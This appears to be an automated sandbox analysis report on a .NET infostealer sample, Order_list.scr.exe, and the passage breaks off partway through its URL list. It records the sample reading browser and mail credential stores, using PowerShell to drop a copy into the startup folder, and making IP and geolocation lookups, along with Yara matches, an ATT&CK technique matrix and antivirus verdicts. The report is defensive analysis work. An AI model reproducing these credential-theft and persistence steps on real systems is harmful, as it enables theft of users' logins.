            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Users\user\Desktop\Order_list.scr.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 5.2.00.exe.3a39840.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.00.exe.3a18e10.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.00.exe.3a39840.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.Order_list.scr.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000005.00000002.4161249755.0000000003A32000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4161249755.0000000003A68000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4161249755.0000000003A34000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4161249755.0000000003A53000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4141697018.000000000348B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4135865956.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.4164055265.0000000003711000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.4142946161.00000000028FD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.4142946161.0000000002731000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4141697018.00000000032C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Order_list.scr.exe PID: 6984, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: Order_list.scr.exe PID: 3584, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: 00.exe PID: 7076, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: 00.exe PID: 6256, type: MEMORYSTR
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
            Source: C:\Users\user\Desktop\Order_list.scr.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: Yara matchFile source: 0.2.Order_list.scr.exe.3719840.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.Order_list.scr.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000005.00000002.4161249755.0000000003A68000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4135865956.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Order_list.scr.exe PID: 6984, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: Order_list.scr.exe PID: 3584, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: 00.exe PID: 7076, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: 00.exe PID: 6256, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 5.2.00.exe.3a39840.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.00.exe.3a18e10.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.00.exe.3a39840.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.Order_list.scr.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000005.00000002.4161249755.0000000003A32000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4161249755.0000000003A68000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4161249755.0000000003A34000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4161249755.0000000003A53000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4141697018.000000000348B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4135865956.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.4164055265.0000000003711000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.4142946161.00000000028FD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.4142946161.0000000002731000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4141697018.00000000032C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Order_list.scr.exe PID: 6984, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: Order_list.scr.exe PID: 3584, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: 00.exe PID: 7076, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: 00.exe PID: 6256, type: MEMORYSTR
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
            PowerShell
            1
            DLL Side-Loading
            1
            DLL Side-Loading
            1
            Disable or Modify Tools
            1
            OS Credential Dumping
            1
            File and Directory Discovery
            Remote Services1
            Archive Collected Data
            1
            Ingress Tool Transfer
            Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault AccountsScheduled Task/Job12
            Registry Run Keys / Startup Folder
            11
            Process Injection
            3
            Obfuscated Files or Information
            LSASS Memory23
            System Information Discovery
            Remote Desktop Protocol1
            Data from Local System
            11
            Encrypted Channel
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)12
            Registry Run Keys / Startup Folder
            1
            Software Packing
            Security Account Manager1
            Query Registry
            SMB/Windows Admin Shares1
            Email Collection
            2
            Non-Application Layer Protocol
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
            Timestomp
            NTDS111
            Security Software Discovery
            Distributed Component Object ModelInput Capture13
            Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            DLL Side-Loading
            LSA Secrets1
            Process Discovery
            SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
            Masquerading
            Cached Domain Credentials41
            Virtualization/Sandbox Evasion
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items41
            Virtualization/Sandbox Evasion
            DCSync1
            Application Window Discovery
            Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job11
            Process Injection
            Proc Filesystem1
            System Network Configuration Discovery
            Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1589903 Sample: Order_list.scr.exe Startdate: 13/01/2025 Architecture: WINDOWS Score: 100 35 reallyfreegeoip.org 2->35 37 checkip.dyndns.org 2->37 39 2 other IPs or domains 2->39 55 Found malware configuration 2->55 57 Malicious sample detected (through community Yara rule) 2->57 59 Antivirus detection for dropped file 2->59 63 11 other signatures 2->63 8 Order_list.scr.exe 2 2->8         started        11 00.exe 2 2->11         started        13 svchost.exe 1 1 2->13         started        signatures3 61 Tries to detect the country of the analysis system (by using the IP) 35->61 process4 dnsIp5 65 Bypasses PowerShell execution policy 8->65 16 powershell.exe 13 8->16         started        20 Order_list.scr.exe 15 2 8->20         started        23 00.exe 14 2 11->23         started        25 powershell.exe 11 11->25         started        45 127.0.0.1 unknown unknown 13->45 signatures6 process7 dnsIp8 31 C:\Users\user\AppData\Roaming\...\00.exe, PE32 16->31 dropped 33 C:\Users\user\...\00.exe:Zone.Identifier, ASCII 16->33 dropped 47 Drops PE files to the startup folder 16->47 49 Powershell drops PE file 16->49 27 conhost.exe 16->27         started        41 checkip.dyndns.com 132.226.247.73, 49730, 49736, 49738 UTMEMUS United States 20->41 43 reallyfreegeoip.org 104.21.64.1, 443, 49733, 49734 CLOUDFLARENETUS United States 20->43 51 Tries to steal Mail credentials (via file / registry access) 23->51 53 Tries to harvest and steal browser information (history, passwords, etc) 23->53 29 conhost.exe 25->29         started        file9 signatures10 process11

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            Order_list.scr.exe63%ReversingLabsByteCode-MSIL.Trojan.Jalapeno
            Order_list.scr.exe100%AviraHEUR/AGEN.1309847
            Order_list.scr.exe100%Joe Sandbox ML
            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe100%AviraHEUR/AGEN.1309847
            C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe100%Joe Sandbox ML
            C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe63%ReversingLabsByteCode-MSIL.Trojan.Jalapeno
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            http://checkip.dyndns.orgX0%Avira URL Cloudsafe
            http://www.ascendercorp.com/typedesigners.htmlit-itt0%Avira URL Cloudsafe
            http://crl.microu0%Avira URL Cloudsafe
            NameIPActiveMaliciousAntivirus DetectionReputation
            reallyfreegeoip.org
            104.21.64.1
            truefalse
              high
              checkip.dyndns.com
              132.226.247.73
              truefalse
                high
                checkip.dyndns.org
                unknown
                unknownfalse
                  high
                  198.187.3.20.in-addr.arpa
                  unknown
                  unknownfalse
                    high
                    NameMaliciousAntivirus DetectionReputation
                    https://reallyfreegeoip.org/xml/8.46.123.189false
                      high
                      http://checkip.dyndns.org/false
                        high
                        NameSourceMaliciousAntivirus DetectionReputation
                        http://www.fontbureau.com/designersGOrder_list.scr.exe, 00000000.00000002.4175434454.0000000006B42000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          http://www.fontbureau.com/designers/?Order_list.scr.exe, 00000000.00000002.4175434454.0000000006B42000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            http://www.founder.com.cn/cn/bTheOrder_list.scr.exe, 00000000.00000002.4175434454.0000000006B42000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              http://crl.microsoftpowershell.exe, 00000001.00000002.1709053274.0000000007410000.00000004.00000020.00020000.00000000.sdmpfalse
                                high
                                http://www.fontbureau.com/designers?Order_list.scr.exe, 00000000.00000002.4175434454.0000000006B42000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://contoso.com/Licensepowershell.exe, 00000006.00000002.1849247138.0000000005A69000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    http://www.tiro.comOrder_list.scr.exe, 00000000.00000002.4175434454.0000000006B42000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://g.live.com/odclientsettings/ProdV2.C:edb.log.4.drfalse
                                        high
                                        http://www.fontbureau.com/designersOrder_list.scr.exe, 00000000.00000002.4175434454.0000000006B42000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          http://www.goodfont.co.krOrder_list.scr.exe, 00000000.00000002.4175434454.0000000006B42000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            http://www.sajatypeworks.comOrder_list.scr.exe, 00000000.00000002.4175434454.0000000006B42000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://www.typography.netDOrder_list.scr.exe, 00000000.00000002.4175434454.0000000006B42000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://g.live.com/odclientsettings/Prod.C:edb.log.4.drfalse
                                                  high
                                                  http://www.founder.com.cn/cn/cTheOrder_list.scr.exe, 00000000.00000002.4175434454.0000000006B42000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    http://www.galapagosdesign.com/staff/dennis.htmOrder_list.scr.exe, 00000000.00000002.4175434454.0000000006B42000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://g.live.com/odclientsettings/ProdV2edb.log.4.drfalse
                                                        high
                                                        https://aka.ms/pscore6lBpowershell.exe, 00000001.00000002.1700469608.00000000049F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1841172457.0000000004A01000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          http://checkip.dyndns.org/qOrder_list.scr.exe, 00000000.00000002.4164055265.0000000003732000.00000004.00000800.00020000.00000000.sdmp, Order_list.scr.exe, 00000003.00000002.4135865956.0000000000402000.00000040.00000400.00020000.00000000.sdmp, 00.exe, 00000005.00000002.4161249755.0000000003A68000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000005.00000002.4161249755.0000000003A32000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://contoso.com/powershell.exe, 00000006.00000002.1849247138.0000000005A69000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://nuget.org/nuget.exepowershell.exe, 00000001.00000002.1706543723.0000000005A58000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1849247138.0000000005A69000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                http://reallyfreegeoip.orgOrder_list.scr.exe, 00000003.00000002.4141697018.000000000346E000.00000004.00000800.00020000.00000000.sdmp, Order_list.scr.exe, 00000003.00000002.4141697018.0000000003425000.00000004.00000800.00020000.00000000.sdmp, Order_list.scr.exe, 00000003.00000002.4141697018.0000000003433000.00000004.00000800.00020000.00000000.sdmp, Order_list.scr.exe, 00000003.00000002.4141697018.000000000347D000.00000004.00000800.00020000.00000000.sdmp, Order_list.scr.exe, 00000003.00000002.4141697018.000000000339D000.00000004.00000800.00020000.00000000.sdmp, Order_list.scr.exe, 00000003.00000002.4141697018.0000000003441000.00000004.00000800.00020000.00000000.sdmp, Order_list.scr.exe, 00000003.00000002.4141697018.0000000003418000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000008.00000002.4142946161.00000000028B4000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000008.00000002.4142946161.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000008.00000002.4142946161.0000000002810000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000008.00000002.4142946161.0000000002898000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000008.00000002.4142946161.00000000028A6000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000008.00000002.4142946161.000000000288A000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000008.00000002.4142946161.00000000028E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://www.galapagosdesign.com/DPleaseOrder_list.scr.exe, 00000000.00000002.4175434454.0000000006B42000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://www.fonts.comOrder_list.scr.exe, 00000000.00000002.4175434454.0000000006B42000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://www.sandoll.co.krOrder_list.scr.exe, 00000000.00000002.4175434454.0000000006B42000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://checkip.dyndns.comOrder_list.scr.exe, 00000003.00000002.4141697018.000000000346E000.00000004.00000800.00020000.00000000.sdmp, Order_list.scr.exe, 00000003.00000002.4141697018.0000000003425000.00000004.00000800.00020000.00000000.sdmp, Order_list.scr.exe, 00000003.00000002.4141697018.0000000003433000.00000004.00000800.00020000.00000000.sdmp, Order_list.scr.exe, 00000003.00000002.4141697018.000000000347D000.00000004.00000800.00020000.00000000.sdmp, Order_list.scr.exe, 00000003.00000002.4141697018.0000000003441000.00000004.00000800.00020000.00000000.sdmp, Order_list.scr.exe, 00000003.00000002.4141697018.0000000003385000.00000004.00000800.00020000.00000000.sdmp, Order_list.scr.exe, 00000003.00000002.4141697018.0000000003418000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000008.00000002.4142946161.00000000028B4000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000008.00000002.4142946161.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000008.00000002.4142946161.0000000002898000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 